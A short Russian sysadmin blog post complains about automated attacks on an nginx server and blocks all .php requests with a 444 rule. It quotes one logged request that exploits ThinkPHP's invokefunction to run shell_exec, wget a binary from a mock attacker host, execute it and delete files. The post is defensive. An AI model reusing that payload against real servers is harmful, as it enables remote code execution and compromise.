Хвостат Хвостатыч (hvostat_hvostat) wrote,
Хвостат Хвостатыч
hvostat_hvostat

"Мамкины хакеры идут на хер"

Проблема:
Мамкины хакеры постоянно ломятся на сервер под управлением nginx и пытаются вызвать там говно, подобное:
GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget httd://pidary.gnoynye/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 157 "-" "Uirusu/2.0" "-"


Решение:
Добавить соответствующем месте conf файла следующие строки:

location ~* ^.*\.php.*$ {
return 444;
}

__
Tags: nginx, php, безопасность, мир идиотов причудлив и разнообразен
Subscribe

  • "Цугцванг"

    Неформат. Психология / социум. Пообщался с друзьями недавно, возникла тема для обсуждения. Приведу очень грубый пример: Есть некая родственница,…

  • * * *

    Диалоги. Строим мелкую инфраструктурку. Сидим небольшой командой, обсуджаем: - Бла бла бла, два фронта, бла бла бла, база данных Постгрес. - Бла бла…

  • "Modus operandi"

    Уважаемый Stanisław klink0v недавно у себя в псто затронул крайне сложную, но интересную тему, а именно: "Вот как бы разработать такую…

  • Post a new comment

    Error

    Anonymous comments are disabled in this journal

    switch
    default userpic

    Your reply will be screened

    Your IP address will be recorded 

    Help
  • 14 comments

  • "Цугцванг"

    Неформат. Психология / социум. Пообщался с друзьями недавно, возникла тема для обсуждения. Приведу очень грубый пример: Есть некая родственница,…

  • * * *

    Диалоги. Строим мелкую инфраструктурку. Сидим небольшой командой, обсуджаем: - Бла бла бла, два фронта, бла бла бла, база данных Постгрес. - Бла бла…

  • "Modus operandi"

    Уважаемый Stanisław klink0v недавно у себя в псто затронул крайне сложную, но интересную тему, а именно: "Вот как бы разработать такую…